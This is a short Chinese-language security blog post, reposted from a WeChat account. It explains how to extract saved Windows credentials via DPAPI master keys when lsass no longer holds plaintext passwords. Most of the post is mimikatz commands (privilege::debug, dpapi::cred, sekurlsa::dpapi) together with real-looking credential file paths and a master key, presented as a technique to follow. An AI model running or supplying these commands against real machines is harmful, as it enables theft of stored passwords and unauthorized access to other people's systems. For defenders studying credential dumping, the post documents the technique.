当windows系统无法直接获取密码的时候

admin 2023年12月10日19:38:35评论37 views字数 733阅读2分26秒阅读模式

当windows系统无法直接获取密码的时候

明明给了我们栖身的角落,心却又无处安放。

众所周知,如果系统安装KB2871997补丁或者系统版本大于等于window server 2012时(服务器版本),大于等于win8.1(家庭版本)时,默认在lsass.exe这个进程中不会再将可逆的密文缓存在进程内存中,所以没办法通过这个进程来逆向获取明文密码了

当windows系统无法直接获取密码的时候

所以,介绍另一个点Master Key Files,其是存放密钥的文件,查看本地用户的Credentials目录下的文件,获取到名称

dir /a %userprofile%AppDataLocalMicrosoftCredentials*

当windows系统无法直接获取密码的时候

接着使用mimikatz来获取guidmasterkey

privilege::debugdpapi::cred /in:C:UsersAdministratorAppDataLocalMicrosoftCredentialsA47CA779D8B065E5E81B05EC6C58173B

当windows系统无法直接获取密码的时候

找对应的masterkey

sekurlsa::dpapi full

当windows系统无法直接获取密码的时候

最后一步,进行解密

dpapi::cred /in:C:UsersAdministratorAppDataLocalMicrosoftCredentials23F9F66C38A139683865D2908E469D9E /masterket:4cdef69942f5b816200cb8fc822d4050d41de34092fb714b31aeb0c450c27f31cbf6a13c9c9be9916773736482bbc328acf806ef567aaab15e5a2145463df1c3

当windows系统无法直接获取密码的时候

原文始发于微信公众号(Enginge):当windows系统无法直接获取密码的时候

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月10日19:38:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   当windows系统无法直接获取密码的时候http://cn-sec.com/archives/2284890.html

发表评论

匿名网友 填写信息